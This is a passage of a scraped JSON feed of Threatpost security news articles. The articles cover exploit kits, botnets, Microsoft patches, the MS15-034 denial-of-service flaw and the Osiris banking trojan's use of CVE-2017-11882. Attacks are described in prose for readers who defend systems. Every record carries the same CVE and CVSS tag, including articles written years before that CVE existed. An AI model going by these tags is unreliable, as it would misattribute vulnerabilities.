And the exploits are showing up in those kits much more quickly than ever before.\n\nDavid Weston, principal program manager on the Microsoft One Protection team, who spoke alongside Miller, said that as recently as the beginning of 2014 it was taking roughly 30 days for exploits for a newly patched vulnerability to show up in the common exploit kits. By the end of the year, it was within ten days of the patch. And now, not only are the kit developers adding exploits for known bugs, but they are in some cases putting in exploits for undisclosed vulnerabilities.\n\n\u201cBy the beginning of this year, we\u2019re seeing the primary exploit kit developers introducing zero days,\u201d Weston said. \u201cThe trickle-down effect is changing, as we\u2019re seeing many more of these crimeware kits source things for themselves. That\u2019s a dramatic change.\u201d\n", "cvss3": {}, "published": "2015-04-21T17:41:22", "type": "threatpost", "title": "Microsoft Data Shows Drop in Remote Code Execution Bugs Being Exploited", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-04-21T21:41:22", "id": "THREATPOST:AD3C2C361C6E263CA6B217D740D6C09F", "href": "https://threatpost.com/microsoft-data-shows-drop-in-remote-code-execution-bugs-being-exploited/112371/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:45", "description": "Dennis Fisher talks with Microsoft\u2019s Adam Shostack about the [Privacy Enhancing Technologies Symposium](<http://petsymposium.org/2009/program.php>), the definition of privacy in today\u2019s world and the role of technology in helping to enhance and protect that privacy.\n\nShow notes: Adam\u2019s [blog post on \u201cUnderstanding Privacy\u201d](<http://www.emergentchaos.com/archives/2008/08/solves_understanding_priv.html>) by Dan 
Solove.\n\nMicrosoft\u2019s [Privacy Guidelines for Developing Software Products and Services](<http://www.microsoft.com/downloads/details.aspx?FamilyId=C48CF80F-6E87-48F5-83EC-A18D1AD2FC1F&displaylang=en>).\n\n[(Download)](<https://threatpost.com/files/2013/04/digital_underground_261.mp3>)\n\nSubscribe to the Digital Underground podcast on [iTunes](<http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=315355232>)\n\n*Podcast audio courtesy of [sykboy65](<http://www.youtube.com/watch?v=Z8fMm3sm_ww&feature=channel_page>)\n", "cvss3": {}, "published": "2009-08-13T20:34:53", "type": "threatpost", "title": "Adam Shostack on Privacy and the PETS '09 Workshop", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:49", "id": "THREATPOST:2A42363A8B070949A25091DE7946F5A2", "href": "https://threatpost.com/adam-shostack-privacy-and-pets-09-workshop-081309/72968/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:45", "description": "For the second month in a row, Microsoft has tried to eradicate a mutating rootkit that has blocked some Windows users from installing security updates. [Read the full article](<http://www.computerworld.com/s/article/9177223/Microsoft_smacks_patch_blocking_rootkit_second_time>). 
[Computerworld]\n", "cvss3": {}, "published": "2010-05-24T14:11:11", "type": "threatpost", "title": "Microsoft Battles Alureon Rootkit", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:43:31", "id": "THREATPOST:F61F8A6168C36EAB1584BC8044080B35", "href": "https://threatpost.com/microsoft-battles-alureon-rootkit-052410/74006/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:28", "description": "One of the men authorities allege to have been behind the massive\u2013and now dead\u2013[Mariposa botnet](<https://threatpost.com/gaps-international-cyber-law-could-hamper-mariposa-case-092910/>), has gone on trial in Slovenia, more than two years after the initial arrests and takedown of the network. \n\nMariposa was one of the first handful of botnets that authorities and security researchers worked together to dismantle. The network appeared on the scene in early 2009 and researchers and law enforcement officials took notice. A working group was formed and researchers began looking at ways to disrupt the botnet\u2019s operation while law enforcement agencies searched for ways to identify the people behind it.\n\nBy the end of the year, researchers in the working group had gathered enough information to take a shot at bringing down Mariposa. In December 2009 researchers announced that they had taken down the botnet after monitoring the communications among the operators and between the infected machines and the command-and-control servers for some time. Soon after, authorities in Spain arrested three suspects they said were involved in running Mariposa, which at one time had approximately 12.5 million machines under its control.\n\nIn the summer of 2010, officials in Slovenia arrested Matjaz Skorjanc, whom they allege is the man who created the bot software and network and then sold it to other attackers for their own use. 
Skorjanc on Tuesday reportedly appeared in court in Slovenia for the beginning of his trial, according to [TechWeek Europe](<http://www.techweekeurope.co.uk/news/mariposa-botnet-trial-88628>). The three suspects arrested in Spain have yet to stand trial.\n", "cvss3": {}, "published": "2012-08-07T15:48:18", "type": "threatpost", "title": "Alleged Mariposa Botmaster in Court", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:44", "id": "THREATPOST:FBDE9552D48B698542D65DEA64890566", "href": "https://threatpost.com/alleged-mariposa-botmaster-court-080712/76886/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:05:06", "description": "LAS VEGAS\u2013In the face of mounting external pressure to begin paying bug bounties, Microsoft is instead launching a new program that will pay a $200,000 top prize to a security researcher who develops the most innovative defensive security technology. The program is designed to \u201cinspire researchers to focus their talents on defensive technologies,\u201d the company said.\n\nKnown as the Blue Hat Prize, after the company\u2019s regular internal research conferences, the program will focus in its first year on getting researchers to design a novel runtime technology to defend against memory safety vulnerabilities. Microsoft security officials said that rather than paying for individual bugs the way that some other companies such as Google, Mozilla and others do, they wanted to encourage researchers to think about ways to defeat entire classes of bugs.\n\n\u201cWhen we looked at the various economic incentive models, the bug bounty was among them. 
But when we looked at what researchers were doing with the bugs they found in our products across the board, we found that there were a lot more motivations for researchers than just money,\u201d said Katie Moussouris, senior security strategist in Microsoft\u2019s Trustworthy Computing Group. \u201cThere\u2019s recognition and there\u2019s what I call the pursuit of intellectual happiness, just the act of finding these issues.\u201d\n\nUnder the rules of the Blue Hat Prize program, any researcher 14 or older is eligible, and the researchers who win prizes will not only get the cash prize, but also will retain full intellectual property rights to the technology. The winners have to agree to license the technology to Microsoft, however.\n\nThe top prize is $200,000; second prize pays $50,000 and third prize is a one-year MSDN subscription, which is worth $10,000. Microsoft also will fly the three winners to Black Hat next year.\n\nResearchers have been calling for [Microsoft to start a bug bounty program](<https://threatpost.com/does-microsoft-need-bug-bounties-050511/>) for several years now, and company officials have repeatedly said that Microsoft is not interested in paying for individual vulnerabilities. This new program gets around the semantics of all that by encouraging researchers to find a new way to mitigate attacks against an entire class of bugs.\n\n\u201cTwo examples of open problems that are suitable for consideration in this challenge are address space information disclosures and return-oriented programming (ROP). Note that you are not required to address these and you are not limited to these examples,\u201d Microsoft said in the rules for the program, which are on the [Blue Hat Prize site](<http://www.microsoft.com/security/bluehatprize/>).\n\nEntries are going to be judged by a panel of security experts from Microsoft teams, including the Microsoft Security Response Center, the Windows team and others. 
\n\nMoussouris said that Microsoft was looking for a way to inspire researchers to focus their talents on defensive technologies and not just finding bugs.\n\n\u201cThis seemed the best way for us to engage with the research community and protect customers simultaneously,\u201d she said.\n", "cvss3": {}, "published": "2011-08-03T17:34:12", "type": "threatpost", "title": "Microsoft to Pay $200,000 for Innovative Defense Technology in Blue Hat Prize Program", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:34:03", "id": "THREATPOST:C8BB08507CBCCE4C217C33C15D3AA04D", "href": "https://threatpost.com/microsoft-pay-200000-innovative-defense-technology-blue-hat-prize-program-080311/75507/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:09", "description": "Microsoft launched a new transparency website this week that bundles reports detailing requests for data the company has received, including those from law enforcement, the government, and elsewhere.\n\nThe page, which Microsoft is calling its [Transparency Hub](<http://www.microsoft.com/about/corporatecitizenship/en-us/transparencyhub/>), is somewhat similar to [what Apple did last month](<https://threatpost.com/apple-goes-all-in-on-privacy/114846/>) when it looped all of its transparency reports together on one page.\n\nWhile Microsoft has issued transparency reports regarding requests from law enforcement and the U.S. government in the past, this is the first time it\u2019s broken down requests the company has received from other parties to outright remove content on sites such as its search engine Bing.\n\nLike the other two reports, the \u201c[Content Removal Requests Report](<http://www.microsoft.com/about/corporatecitizenship/en-us/transparencyhub/crrr/>)\u201d pertains to requests from the first six months of the calendar year. 
The main difference is this report mostly culls information on requests from other governments, requests from European residents citing a special European Court of Justice ruling, and requests from copyright owners claiming their work was infringed.\n\nAccording to the report, China far and away had the most requests for content to be removed, with 165 requests filed compared to 11 from the United States, and 10 from Austria, Germany, Russia, and the U.K. combined. The report doesn\u2019t specify exactly what the content was or where it was located, but claims the numbers are from Microsoft entities like Bing, OneDrive, and MSN.\n\nThere were many more requests to remove copyrighted information, just north of one million, according to Microsoft. In this case, it was usually URLs that were being shown in Bing searches that contained copyrighted material. Microsoft claims it complied with 92 percent of requests. Since this is an inaugural report however, there are no statistics from last year to compare the numbers to.\n\nThe company received 3,546 requests from European residents to remove results for queries in Bing that included their name. A rule passed last year called the \u2018Right To Be Forgotten\u2019 rule allows users to ask their name be removed if the results were inadequate, inaccurate or no longer relevant. Microsoft complied with 50 percent of those requests.\n\nAs far as law enforcement requests, Microsoft received 35,228, a slight uptick from the second half of 2014 when it received 31,002. The report claims only three percent of requests it received led to the disclosure of content customers created, shared or stored on its services. 
The company rejected 12 percent of requests, up from 7.5 percent in the second half of last year.\n\nThe company, as it\u2019s done for the past several years, also claims it received somewhere [between zero and 999 National Security Letters](<http://www.microsoft.com/about/corporatecitizenship/en-us/transparencyhub/fisa/>). The government only permits companies to disclose requests in bands of 1000, which explains the vague number.\n\nThe company got permission to start sharing information pertaining to legal demands they receive in early 2014 but has been posting the reports pertaining to law enforcement twice a year [since 2013](<https://threatpost.com/microsoft-transparency-report-shows-company-supplied-user-content-22-cases-032113/77653/>), largely in response to a growing demand for transparency from big data companies in the post-Snowden world.\n", "cvss3": {}, "published": "2015-10-15T15:32:57", "type": "threatpost", "title": "Latest Microsoft Transparency Report Details Content Removal Requests", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-10-15T19:32:57", "id": "THREATPOST:6232FE8F8C59D8BBBD6CD0EAAD3D4AA3", "href": "https://threatpost.com/latest-microsoft-transparency-report-details-content-removal-requests/115062/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:40", "description": "There is an unpatched flaw in Microsoft SQL Server that could enable an attacker to access users\u2019 passwords on the database server. The vulnerability is in SQL Server 2000, 2005 and 2008.\n\nThe SQL Server vulnerability was discovered last fall by database-security vendor Sentrigo, which then reported the problem to Microsoft. 
But the software giant did not consider the problem serious enough to warrant a patch, Sentrigo officials said, so the weakness has remained unpatched for nearly a year. Sentrigo has released a [free software tool](<http://www.sentrigo.com/passwords>) that will address the problem, though it does not patch the vulnerability.\n\nThe tool, called Passwordizer, erases the cleartext passwords from the database server.\n\nIn a statement, Microsoft officials said the company is not planning to patch the flaw and does not see it as a problem that requires a security update.\n\nThe flaw lies in the way that SQL Server handles user passwords. By looking at the process memory, an administrator can see other users\u2019 passwords in cleartext. However, in order to see the process memory dump, a user would have to have administrator rights already, a condition that limits the severity of the bug.\n\n\u201cDevelopers go to great lengths to ensure passwords are not even transmitted in clear text (for example at the time of login), let alone stored in a readable form. Users have come to expect that their personal passwords are exactly that \u2013 personal \u2013 and that not even administrators can see them. Exploiting this vulnerability, an administrator will be able to see the passwords of users and applications that have connected to SQL Server, all the way back to the last restart,\u201d said Slavik Markovich, CTO of Sentrigo. \u201cWe respectfully disagree with Microsoft\u2019s view that since it requires administrative privileges, the risk is mitigated. 
Even if you trust your admins, there are plenty of hackers capable of gaining escalated privileges, who could now easily access other systems across the network using these passwords.\u201d\n\nThe flaw can be exploited remotely in SQL Server 2000 and 2005, but in SQL Server 2008 Microsoft made a change to make it more difficult for administrators to access the memory, so an attacker would need local access to the machine in that case.\n", "cvss3": {}, "published": "2009-09-02T12:30:49", "type": "threatpost", "title": "New Unpatched Flaw Surfaces in SQL Server", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:44", "id": "THREATPOST:1FB92D9630590CC17FF00234FF9991FF", "href": "https://threatpost.com/new-unpatched-flaw-surfaces-sql-server-090209/73026/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:02", "description": "**UPDATE \u2013 **Microsoft\u2019s characterization of [MS15-034](<https://technet.microsoft.com/library/security/MS15-034>) as a remote code execution vulnerability certainly has a lot of Windows server admins on edge waiting for the other shoe to drop.\n\nIn the three days since the bulletin was released warning of a [critical vulnerability in the HTTP protocol stack](<https://threatpost.com/microsoft-patches-critical-http-sys-vulnerability/112251>), HTTP.sys, security experts, including the SANS Institute, have warned of publicly available denial-of-service exploits targeting Microsoft IIS webservers. There\u2019s also the possibility of information leakage via this issue that could pave the way for more serious attacks, but for now, a crashing and rebooting IIS server might be your only sign of trouble.\n\n\u201cSo far we see active exploitation for the denial-of-service vulnerability. 
The information disclosure vulnerability has been demonstrated, but we have not seen it used against any of our honeypots yet, nor have we seen any reports of it being used in attacks,\u201d Johannes Ullrich of the SANS Institute told Threatpost.\n\nUllrich was quick to point out too that there are Internet-wide scans happening now, that are not just looking for vulnerable servers, but also trying to crash them.\n\n\u201cIt\u2019s extremely easy to exploit,\u201d Ullrich said during an emergency webcast last night. \u201cThat\u2019s the problem with this vulnerability, it\u2019s so easy.\u201d\n\nMicrosoft, meanwhile, said customers should prioritize this bulletin and patch as soon as possible.\n\n\u201cUpdate MS15-034 was classified as a remote code execution bulletin because, while that type of exploit is harder to carry out it is theoretically possible,\u201d said a Microsoft spokesperson.\n\nThe SANS Internet Storm Center yesterday [raised its alert level](<https://isc.sans.edu/forums/diary/MS15034+HTTPsys+IIS+DoS+And+Possible+Remote+Code+Execution+PATCH+NOW/19583/1/>), and said active exploits were hitting its honeypots from 78[.]186[.]123[.]180. Some reported to the ISC attacks they believed were more targeted against specific webservers.\n\n\u201cIf you have been the subject of a denial-of-service attack in the past, this is a much better and easier way to achieve the same thing than doing NTP reflection or whatever against your server,\u201d Ullrich said. \u201cThis is the main exposure right now.\u201d\n\nWhile IIS, or Internet Information Services servers, are the principal attack vector right now, this isn\u2019t necessarily solely an IIS problem. Lots of services make use of HTTP.sys.\n\n\u201cIt\u2019s really not an IIS vulnerability, but it is exposed via IIS,\u201d Ullrich said. \u201cThe HTTP.sys vulnerability: Every Windows system has it whether it\u2019s running IIS or not. 
It\u2019s a system library that implements the parsing of http requests and implements caching content in kernel memory.\u201d\n\nOne of Microsoft\u2019s workarounds, for example, was to disable IIS kernel caching, but there is a gotcha.\n\n\u201cTurning off kernel caching will prevent the exploit. The system is only vulnerable if kernel caching is turned on,\u201d Ullrich said. \u201cHowever, it will cause a significant loss in performance, so this may then turn into a denial of service for a busy site as it can no longer fulfill all requests.\u201d\n\nThe crux of the vulnerability lies in the range header, which extracts portions of webpages from kernel memory and passes them to the client. A [specifically crafted range header](<http://blog.didierstevens.com/2015/04/17/ms15-034-detection-some-observations/>) will trigger the denial-of-service vulnerability so long as certain conditions are met within the range. This has the potential to be quite disruptive, despite the vast majority of webservers being Linux boxes (70 million Windows servers could be affected according to [Netcraft](<http://news.netcraft.com/archives/2015/04/16/critical-windows-vulnerability-affects-at-least-70-million-websites.html>)).\n\nThe information disclosure weakness is concerning as well because there are ways to get a kernel memory dump back in a response from HTTP.sys. This will evoke memories of Heartbleed, which also led to memory leakage and inevitably a slew of exploits with varying results. Ullrich said that memory disclosure in this case, however, is trickier to retrieve than with Heartbleed, but it could be used to inch closer to remote code execution.\n\n\u201cCurrently, there is no known exploit that would cause remote code execution. Likely, an attacker would first have to use the information disclosure vulnerability to learn more about the internal memory layout to then follow up with a remote code execution exploit,\u201d he said. 
\u201cBut since the information disclosure attack will also cause a reboot, this information may not be all that valuable.\u201d\n\n_This article was updated at 1 p.m. ET with a comment from Microsoft._\n", "cvss3": {}, "published": "2015-04-17T11:06:54", "type": "threatpost", "title": "Active DoS Exploits for MS15-034 Under Way", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-04-21T14:51:48", "id": "THREATPOST:C9B3ABEF738D9A1E524FB94613BA5CBA", "href": "https://threatpost.com/active-dos-exploits-for-ms15-034-under-way/112314/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:20", "description": "Microsoft took less than a month to incorporate an [Oracle Outside In patch](<http://threatpost.com/hefty-oracle-july-critical-patch-update-contains-89-patches/101370>) and fix a critically rated remote code execution bug in Exchange Servers. The Microsoft patch is among three critical bulletins\u2014eight overall\u2014released today as part of [its August 2013 Patch Tuesday security updates](<http://blogs.technet.com/b/msrc/archive/2013/08/13/leaving-las-vegas-and-the-august-2013-security-updates.aspx>).\n\nOracle patched Outside In with its [July Critical Patch Update (CPU)](<http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html#AppendixFMW>); the technology allows developers to turn unstructured file formats into normalized files. [MS13-061](<https://technet.microsoft.com/en-us/security/bulletin/ms13-061>) includes the Outside In Patch, which is part of the WebReady Document Viewing and Data Loss Prevention features on Exchange Servers. Exploits could allow an attacker to remotely execute code if a user previews or opens a malicious file using Outlook Web App (OWA). 
The attacker would have the same privileges as the transcoding services on the Exchange Server; that would be the LocalService account for WebReady Document Viewing and the Filtering Management service for the DLP feature. Both, however, run with minimal privileges.\n\n\u201cIf you run Exchange and your users have OWA, you should address this issue as quickly as possible,\u201d said Qualys CTO Wolfgang Kandek. Microsoft also recommends a workaround that turns off Outside In document processing.\n\n[MS13-059](<https://technet.microsoft.com/en-us/security/bulletin/ms13-059>) is another cumulative patch for Internet Explorer and repairs 11 remotely executable vulnerabilities in the browser, including a sandbox bypass vulnerability discovered and exploited by VUPEN researchers during the Pwn2Own contest in March. IE 6-10 is vulnerable to exploit; Microsoft said it is not aware of any active exploits for any of these vulnerabilities.\n\nThe IE rollup includes patches for nine memory corruption vulnerabilities, as well as fixes for a privilege escalation flaw in the way in which the browser handles process integrity level assignment and an information disclosure cross-site scripting vulnerability in EUC-JP character encoding, Microsoft said.\n\n\u201cAs usual with IE vulnerabilities, the attack vector would be a malicious webpage, either exploited by the attacker or it could be sent to the victim in a spear-phishing e-mail,\u201d Kandek said. \u201cPatch this immediately as the highest priority on your desktop system and wherever your users browse the web.\u201d\n\nThe final critical bulletin, [MS13-060](<https://technet.microsoft.com/en-us/security/bulletin/ms13-060>), patches a Windows vulnerability in the Unicode Scripts Processor; the patch corrects the way Windows parses certain OpenType font characteristics. 
An exploit could allow an attacker to run code remotely if a user opens a malicious document or visits a website that supports OpenType fonts.\n\n\u201cA user would have to be induced to open a malicious file and this only affects Windows XP and 2003,\u201d said Ross Barrett, senior manager of security engineering at Rapid7. \u201cBoth of these issues should be patched ASAP.\u201d Microsoft also recommends two workarounds: either modifying the usp10.dll Access Control List to be more restrictive, or disabling support for parsing embedded fonts in IE.\n\nThe remaining bulletins were all rated Important by Microsoft.\n\n * [MS13-062](<https://technet.microsoft.com/en-us/security/bulletin/ms13-062>) patches a privilege escalation vulnerability in Windows RPC, correcting the manner in which Windows handles asynchronous RPC messages. \u201cPerhaps the most genuinely interesting vulnerability this month,\u201d Barrett said, adding that the bug is a post authentication issue in RPC. \u201cMicrosoft has described this as extremely difficult to exploit, which I can only assume is a challenge to exploit writers everywhere to prove them wrong.\u201d\n * [MS13-063](<https://technet.microsoft.com/en-us/security/bulletin/ms13-063>) is another privilege escalation issue in the Windows kernel. Four vulnerabilities are patched in this bulletin, the most severe of which enables elevated privileges if an attacker is able to log in locally and run a malicious application. In addition to memory corruption bugs, one of the vulnerabilities in this bulletin enables an attacker to bypass Address Space Layout Randomization (ASLR), a memory protection native to the OS.\n * [MS13-064](<https://technet.microsoft.com/en-us/security/bulletin/ms13-064>) patches a denial of service vulnerability in Windows NAT Driver. 
An attacker would have to send a malicious ICMP packet to a server running the NAT Driver services in order to exploit this bug, which affects only Windows Server 2012.\n * [MS13-065](<https://technet.microsoft.com/en-us/security/bulletin/ms13-065>) also fixes a denial of service bug in ICMPv6; Vista, Windows Server 2008, Windows 7, Windows 8, Windows RT and Windows Server 2012 are affected by this bug.\n * [MS13-066](<https://technet.microsoft.com/en-us/security/bulletin/ms13-066>) patches an information-disclosure vulnerability in Active Directory Federation Services on Windows Server 2008 and Windows Server 2012. An exploit could force the service to leak information about itself and allow an attacker to use that information to try to log in remotely.\n", "cvss3": {}, "published": "2013-08-13T14:28:51", "type": "threatpost", "title": "August 2013 Microsoft Patch Tuesday Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-08-13T18:28:51", "id": "THREATPOST:270516BE92D218A333101B23448C3ED3", "href": "https://threatpost.com/microsoft-august-patch-tuesday-addresses-critical-ie-exchange-and-windows-flaws/101981/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:05", "description": "[From eWEEK (Brian Prince)](<http://www.eweek.com/c/a/Security/Pirated-Windows-7-Builds-a-Botnet-With-Trojan-456054/>)\n\nAttackers pushing pirated, malware-laced copies of Microsoft\u2019s upcoming Windows 7 operating system have been actively trying to build a botnet.\n\nAccording to researchers at Damballa, attackers hid a Trojan inside pirated copies of the operating system and began circulating them on BitTorrent sites. Damballa reported that it shut down the botnet\u2019s command and control server May 10, but by that time infection rates had risen as high as 552 users per hour. 
[Read the full story](<http://www.eweek.com/c/a/Security/Pirated-Windows-7-Builds-a-Botnet-With-Trojan-456054/>) [eweek.com]\n", "cvss3": {}, "published": "2009-05-12T22:23:28", "type": "threatpost", "title": "Pirated Windows 7 builds botnet with Trojan", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:12", "id": "THREATPOST:AA7C9EFD06F74FBC5580C0384A39AA56", "href": "https://threatpost.com/pirated-windows-7-builds-botnet-trojan-051209/72691/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-30T05:51:18", "description": "After staying dormant for a few years, the Kronos banking trojan resurfaced in July in a form dubbed Osiris. A wider analysis of how the banking trojan is evolving shows innovative development on the part of its authors, with an eye to broader malware trends.\n\nOsiris [first appeared in July](<https://threatpost.com/kronos-banking-trojan-resurfaces-after-years-of-silence/134364/>) in three distinct campaigns targeting Germany, Japan and Poland over the summer. It was clear that it\u2019s based on the [Kronos malware](<https://threatpost.com/new-kronos-banking-malware-advertised-on-russian-forums/107210/>), which led the financial crime pack for many quarters after it surfaced in 2014 (it is itself a descendant of the infamous [Zeus banking code](<https://threatpost.com/versatility-of-zeus-framework-encourages-criminal-innovation/106638/>)).\n\nWhile the behaviors exhibited by the newly spawned banking trojan are similar to those of many other prevalent banking malware families (for instance, it implements Zeus-style G/P/L web-injects, a keylogger and a VNC server, according to Securonix researcher Oleg Kolesnikov), there are also significant differences.\n\nFor one, it uses encrypted Tor traffic for command-and-control (C2). 
\u201cThe malicious payload spawns multiple processes named \u2018tor.exe\u2019 and connects to multiple distinct hosts (Tor nodes) located in different countries,\u201d Kolesnikov said in [a post](<https://www.securonix.com/securonix-threat-research-kronos-osiris-banking-trojan-attack>) Tuesday on Osiris.\n\nAlso, Osiris has upped the game on evasion efforts. As Kolesnikov explained in an interview with Threatpost, \u201cOne of the new aspects of Osiris that is particularly notable is a fairly innovative legitimate process impersonation technique.\u201d He added that this evasion technique combines the recently pioneered [process-doppelganging approach](<https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf>) with the more traditional [process-hollowing](<https://threatpost.com/mylobot-botnet-emerges-with-rare-level-of-complexity/132967/>) technique.\n\n\u201cThis can potentially make detection of the banking trojan\u2019s activity using purely endpoint tools more challenging compared to tools that are capable of looking at the behaviors of other entities besides endpoints\u2026[such as] network and user information,\u201d he said.\n\n**The Attack Pattern**\n\nThe primary infiltration vector that has so far been [seen in the wild](<https://research.checkpoint.com/osiris-enhanced-banking-trojan>) for Osiris is spam email. The messages carry specially crafted Microsoft Word documents or RTF attachments with macro/OLE content that cause malicious, obfuscated VB stages to be dropped and executed. 
In many scenarios, the malware is distributed using exploit kits like RIG EK, the analysis showed.\n\nThe malicious document exploits a well-known stack buffer overflow in the Microsoft Office Equation Editor component ([CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>)), which allows the attacker to execute arbitrary code.\n\n\u201cThe vulnerability resides in the Equation Editor Component which, when used, runs as its own process (eqnedt32.exe),\u201d Kolesnikov explained. \u201cBecause of the way it was implemented, it doesn\u2019t support Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR). A malicious document exploits the vulnerability to execute a command to download the latest version of [Osiris].\u201d\n\nOsiris, like other banking trojans, is mainly aimed at stealing credentials and other sensitive data from online banking accounts. Its primary collection method is a man-in-the-browser attack: malicious script is injected into banking websites and form values are grabbed as the user submits them.\n\n**A Thoroughly Modern Malware**\n\nNotably, Osiris\u2019 fundamental makeup positions it at the forefront of malware trends, despite being based on old source code that\u2019s been knocking around for years.\n\n\u201cBased on the banking attacks we are seeing in the wild, there appears to be a growing trend towards a convergence of malicious features offered by many trojans,\u201d Kolesnikov told Threatpost. 
\u201cFor instance, it is quite common to see the same baseline set of features offered in many prevalent bank trojans, such as form-grabbing, sandbox and AV bypass, web injections, password recovery, keylogging and remote access.\u201d\n\nHe added that the latest version of Osiris also fits into a trend of malware adopting [a more modular architecture](<https://threatpost.com/bad-actors-sizing-up-systems-via-lightweight-recon-malware/137364/>) in general; this enables malicious actors to provide updates and plugins to implement various malicious behaviors after an initial infection.\n\nThis dovetails with \u201ca growing trend for more rapid malware prototyping and a decrease in the \u2018research-to-malware\u2019 time it takes for malicious threat actors to implement the latest attack and evasion techniques reported in the security community,\u201d he added.\n\nUnfortunately, Osiris is poised to become more widespread, given that its pricing on the Dark Web lowers the barrier to entry for bad actors.\n\n\u201cAnother aspect is that Osiris is relatively cheaper compared to Kronos, which was sold for $3,000 in 2014, compared to Osiris that is sold for $2,000 in 2018, making it potentially more accessible to more cybercriminals,\u201d Kolesnikov told us. 
\u201cAlso, Osiris authors offered an option of reselling the license for $1,000 (not offered for Kronos), which can potentially further increase the scale and impact of the malicious threat.\u201d\n", "cvss3": {}, "published": "2018-09-12T16:12:55", "type": "threatpost", "title": "Osiris Banking Trojan Displays Modern Malware Innovation", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-09-12T16:12:55", "id": "THREATPOST:43B03902EBB289EABEA3B61E32BF7B7B", "href": "https://threatpost.com/osiris-banking-trojan-displays-modern-malware-innovation/137393/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-11T11:45:33", "description": "Microsoft is warning of a fresh email campaign that distributes malicious RTF files booby-trapped with an exploit for a 2017 vulnerability, [CVE-2017-11882](<https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/>).\n\nThe exploit allows attackers to automatically run malicious code without requiring user interaction.\n\n\u201cThe CVE-2017-11882 vulnerability was fixed in 2017, but to this day, we still observe the exploit in attacks,\u201d Microsoft Security Intelligence tweeted on Friday. \u201cNotably, we saw increased activity in the past few weeks. We strongly recommend applying security updates.\u201d\n\n> An active malware campaign using emails in European languages distributes RTF files that carry the CVE-2017-11882 exploit, which allows attackers to automatically run malicious code without requiring user interaction. 
[pic.twitter.com/Ac6dYG9vvw](<https://t.co/Ac6dYG9vvw>)\n> \n> \u2014 Microsoft Security Intelligence (@MsftSecIntel) [June 7, 2019](<https://twitter.com/MsftSecIntel/status/1137118977983897600?ref_src=twsrc%5Etfw>)\n\nThe flaw is a stack-based overflow bug in Microsoft Equation Editor.\n\n\u201cThe security flaw affected all versions of Microsoft Office, Microsoft Windows and architecture types dating back to 2000,\u201d Tripwire explained in [a write-up](<https://www.tripwire.com/state-of-security/latest-security-news/microsoft-warns-of-malspam-campaign-abusing-office-vulnerability-to-distribute-backdoor/>), posted Monday. \u201cThe security weakness enables a bad actor to execute arbitrary code on a vulnerable machine. In [an] analysis, for instance, researchers found a digital attacker could easily launch a file from the WebDAV server under their control as well as use an OLE auto-update to exploit the flaw without any user interaction.\u201d\n\nIn the current wave of attacks, targets receive an email in one of several European languages. If the recipient falls for the lure and opens the RTF file, it downloads and runs multiple scripts of different types (VBScript, PowerShell, PHP and others), which in turn download a backdoor payload. The backdoor then tries to connect to a command-and-control server (which was down at the time of Microsoft Security Intelligence\u2019s warning).\n\nThe same bug was at the heart of a campaign in late 2018 and early 2019 that distributed the most recent version of the HawkEye keylogger. Emails arrived with malicious Microsoft Excel, RTF and Doc attachments loaded with an exploit for the arbitrary code-execution bug.\n\nOnce a victim opened the attachment, its contents were deliberately blurred and the user was prompted to enable editing to get a clearer view. 
